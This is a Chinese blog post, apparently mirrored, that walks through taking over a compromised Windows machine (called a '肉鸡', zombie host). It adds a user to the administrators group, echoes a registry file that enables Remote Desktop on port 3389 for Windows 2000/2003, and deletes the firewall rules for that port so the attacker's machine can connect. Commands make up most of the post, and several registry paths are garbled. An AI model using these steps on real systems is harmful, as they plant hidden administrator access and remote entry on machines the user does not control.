zoukankan      html  css  js  c++  java

  • Windows提权与开启远程连接

    1.提权:

        建立普通用户:net user 帐户  密码 /add

    提权成管理员:net localgroup administrators 帐户 /add

    更改用户密码:net user  帐户  密码

    删除用户: net user 帐户 /del

    2.开启远程连接:

    windows2000 cmd下开3389

    echo Windows Registry Editor Version 5.00 >>3389.reg
echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion
etcache] >>3389.reg
echo "Enabled"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon] >>3389.reg
echo "ShutdownWithoutLogon"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller] >>3389.reg
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server] >>3389.reg
echo "TSEnabled"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermDD] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermService] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_USERS.DEFAULTKeyboard LayoutToggle] >>3389.reg
echo "Hotkey"="1" >>3389.reg
echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWds
dpwdTds	cp] >>3389.reg
echo "ortNumber"=dword:00000D3D >>3389.reg
echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp] >>3389.reg
echo "ortNumber"=dword:00000D3D >>3389.reg

    windows2003 CMD开3389:

    echo Windows Registry Editor Version 5.00 >>3389.reg
echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server] >>3389.reg
echo "fDenyTSConnections"=dword:00000000 >>3389.reg
echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWds
dpwdTds	cp] >>3389.reg 
echo "ortNumber"=dword:00000D3D >>3389.reg
echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
    在cmd中输入:regedit /s 3389.reg 导入注册表

    3.攻击机建立远程连接,如果连接不上,说明肉鸡开了防火墙,所以我们要删除防火墙的3389规则

        输入netsh firewall /?显示命令的用法
    应该会出现delete选项。这时再输入:netsh firewall delete。较新的版本应该只显示“下列命令有效:”就没了,这时我们应该换一个命令。如下

    输入netsh advfirewall firewall /?显示命令的用法
    也会出现delete选项。输入:netsh advfirewall firewall delete。显示“delete rule    - 删除所有匹配的防火墙规则。”
    按照提示,输入:netsh advfirewall firewall delete rule。这时会显示一场段的提示,这里我就不再粘贴了,提示的最后有事例,你可以看一下
    最后,直接用这个命令干掉(删除)防火墙对于3389端口设置的规则。 终极命令如下:

    netsh advfirewall firewall delete rule name=all protocol=tcp localport=3389

    bingo! 现在可以连上了吧?
  • 相关阅读:
    LOJ2565. 「SDOI2018」旧试题
    位运算
    Arrays.sort()原理
    LinkedList源码解析
    二维数组排序
    数据结构和算法-五大常用算法:贪心算法
    数据结构和算法-五大常用算法:分支限界法
    数据结构和算法-五大常用算法:分治算法
    数据结构和算法-二分查找
    Arrays.copyOf()&Arrays.copyOfRange()&System.arraycopy
  • 原文地址:https://www.cnblogs.com/litlife/p/7702689.html
Copyright © 2011-2022 走看看